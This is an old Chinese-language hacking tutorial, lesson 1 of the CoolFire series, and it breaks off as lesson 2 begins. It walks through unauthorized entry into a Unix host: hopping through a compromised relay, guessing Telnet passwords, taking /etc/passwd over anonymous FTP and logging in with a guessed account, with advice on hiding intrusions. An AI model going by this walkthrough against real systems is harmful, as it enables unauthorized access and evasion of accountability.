coolfire黑客入门教程系列

CoolFire系列讲座第1讲作者:CoolFire[coolfires@hotmail.com](2001-10-1215:00:00)CoolHCVolume1ByCoolFireAuthorE-Mail:coolfires@hotmail.com这不是一个教学文件,只是告诉你该如何破解系统,好让你能够将自己的系统作安全的保护,如果你能够将这份文件完全看完,你就能够知道电脑骇客们是如何入侵你的电脑,我是CoolFire,写这篇文章的目的是要让大家明白电脑安全的重要性,并不是教人CrackPassword若有人因此文件导致恶意入侵别人的电脑或网路,本人概不负责!!#1甚么是Hacking?就是入侵电脑!有甚么好解释的!大部份有关介绍Hacker的书籍或小说及文件等都有清楚的介绍,沉迷於电脑的人...破坏...唉!一大堆怪解释就是了,最好不要成为一个骇客,我...不是!#2为甚么要Hack?我们只是为了要解更多关於系统的技术,入侵它,了解它是如何运作的,试试它的安全性,然後学著去使用它,读取系统中有关操作的说明,学习它的各项操作!!为了安全性而作革命!#3Hack守则1.不恶意破坏任何的系统,这样作只会给你带来麻烦.恶意破坏它人的软体将导致法律刑责,如果你只是使用电脑,那仅为非法使用!!注意:千万不要破坏别人的软体或资料!!2.不修改任何的系统档,如果你是为了要进入系统而修改它,请在答到目的後将它改回原状.3.不要轻易的将你要Hack的站台告诉你不信任的朋友.4.不要在bbs上谈论你Hack的任何事情.5.在Post文章的时候不要使用真名.6.正在入侵的时候,不要随意离开你的电脑.7.不要侵入或破坏政府机关的主机.8.不在电话中谈论你Hack的任何事情.9.将你的笔记放在安全的地方.10.想要成为Hacker就要真正的Hacking,读遍所有有关系统安全或系统漏洞的文件(英文快点学好)!11.已侵入电脑中的帐号不得清除或修改.12.不得修改系统档案,如果为了隐藏自己的侵入而作的修改则不在此限,但仍须维持原来系统的安全性,不得因得到系统的控制权而将门户大开!!13.不将你已破解的帐号分享与你的朋友.#4破解之道1.进入主机中2.得到/etc/passwd3.得到系统帐号4.得到最高权限-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-How1.进入主机有好几种方式,可以经由Telnet(Port23)或SendMail(Port25)或FTP或(Port80)的方式进入,一台主机虽然只有一个位址,但是它可能同时进行多项服务,所以如果你只是要进入该主机,这些Port都是很好的进行方向.当然还有很多Port,但是DayTime的Port你能拿它作甚么???我不知道,你知道吗?!底下的示范并不是像写出来的那么容易,只不过是要让你解如何进入,当然其中还有很多问题,如打错指令......等等的毛病...没有出现在课堂上,但是我为了面子....一定要删掉这些不堪入目的东西嘛...示范进入主机的方法:(ByCoolFire)(首先要先连上某一台你已经有帐号的Telnet主机,当然最好是假的,也就是Crack过的主机,然後利用它来Crack别的主机,才不会被别人以逆流法查出你的所在)DigitalUNIX(ms.hinet.net)(ttypa)login:FakeNamePassword:Lastlogin:MonDec203:24:00from255.255.0.0(我用的是ms.hinet.net...当然是假的罗,都已经经过修改了啦!!没有这一台主机啦!!别怕!别怕!以下的主机名称都是假的名称,请同学们要记得!!)DigitalUNIXV1.2C(Rev.248);MonOct3121:23:02CST1996DigitalUNIXV1.2CWorksystemSoftware(Rev.248)DigitalUNIXChineseSupportV1.2C(rev.3)(嗯...进来了!开始攻击吧!本次的目标是......)ms.hinet.nettelnet(Telnet试试看....)Trying111.222.255.255...Connectedtocool.fuckyou.hinet.net.Escapecharacteris'^]'.Password:Loginincorrect(没关系,再来!!)coollogin:hinetPassword:Loginincorrectcoollogin:(都没猜对,这边用的是猜的方法,今天运气好像不好)telnetcloseConnectionclosed.(重来,换个Port试试看!!)ms.hinet.nettelnet111.222.255.25580Trying111.222.255.255...Connectedto111.222.255.255.Escapecharacteris'^]'.HTMLHEADTITLEError/TITLE/HEADBODYH1Error400/H1Invalidrequest(unknownmethod)PHRADDRESSAHREF=(哇哩!!连密码都没得输入,真是.....再来!!要有恒心!!)(换FTPPort试试)ms.hinet.netftp111.222.255.255Connectedto111.222.255.255.220coolFTPserver(Versionwu-2.4(1)TueAug815:50:43CDT1995)ready.Name(111.222.255.255:FakeName):anonymous331Guestloginok,sendyourcompletee-mailaddressaspassword.Password:230-Welcome,archiveuser!ThisisanexperimentalFTPserver.Ifhaveany230-unusualproblems,pleasereportthemviae-mailtoroot@cool.com230-Ifyoudohaveproblems,pleasetryusingadash(-)asthefirstcharacter230-ofyourpassword--thiswillturnoffthecontinuationmessagesthatmay230-beconfusingyourftpclient.230-230Guestloginok,accessrestrictionsapply.RemotesystemtypeisUNIX.Usingbinarymodetotransferfiles.(哇!可以用anonymous进来耶!!password部份输入aaa@就好了!不要留下足迹喔!!)ftpls200PORTcommandsuccessful.150OpeningASCIImodedataconnectionforfilelist.etcpubusrbinlibincomingwelcome.msg226Transfercomplete.(嗯嗯...太好了!进来了!!下一个目标是.....)ftpcdetc250CWDcommandsuccessful.ftpgetpasswd(抓回来!!)200PORTcommandsuccessful.150OpeningBINARYmodedataconnectionforpasswd(566bytes).226Transfercomplete.566bytesreceivedin0.56seconds(0.93Kbytes/s)(喔...这么容易吗??)ftp!catpasswd(看看!!!)root::0:0:root:/root:/bin/bashbin:*:1:1:bin:/bin:daemon:*:2:2:daemon:/sbin:adm:*:3:4:adm:/var/adm:lp:*:4:7:lp:/var/spool/lpd:sync:*:5:0:sync:/sbin:/bin/syncshutdown:*:6:0:shutdown:/sbin:/sbin/shutdownhalt:*:7:0:halt:/sbin:/sbin/haltmail:*:8:12:mail:/var/spool/mail:news:*:9:13:news:/var/spool/news:uucp:*:10:14:uucp:/var/spool/uucp:operator:*:11:0:operator:/root:/bin/bashgames:*:12:100:games:/usr/games:man:*:13:15:man:/usr/man:postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bashftp:*:404:1::/home/ftp:/bin/bash(哇哩...是Shadow的...真是出师不利....)ftpbye221Goodbye.(不信邪....还是老话,要有恒心....)(FTP不行,再Telnet看看!!)ms.hinet.nettelnet^]'.Password:Loginincorrect(又猜错!!)coollogin:fuckyouPassword:Lastlogin:MonDec209:20:07from205.11.122.12Linux1.2.13.Someprogramminglanguagesmanagetoabsorbchangebutwithstandprogress.cool:~$(哇哈哈!!哪个笨root,用systemname作username连password也是systemname....总算...没白玩...)cool:~$systembash:system:commandnotfound(嗯...这个user的权限好像不大....)cool:~$lscool:~$pwd/home/fuckyoucool:~$cd/cool:/$lsPublic/cdrom/lib/mnt/tmp/*proc/usr/bin/etc/local/root/var/boot/home/lost+found/sbin/cool:/$cdetctelnetquit(好想睡呀!!不玩了!!下节课再开始....)Connectionclosed.ms.hinet.netexit(走了!!下节课在见啦!!今天就上到这里!老师要先下班了!!)(有学生说:骗人!还没有破解呀!!胡说!不是已经进来了吗???看看这节课上的是甚么???----进入主机!!嗯.....)-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-How2.上节课抓回来一个乱七八糟的/etc/passwd,你以为我的真那么笨吗??guest所抓回来的能是甚么好东西??所以这一节课继续上次的攻击行动.上节课我们已经猜到了一个不是guest的username及password.今天就以它来进入主机瞧瞧!!Digita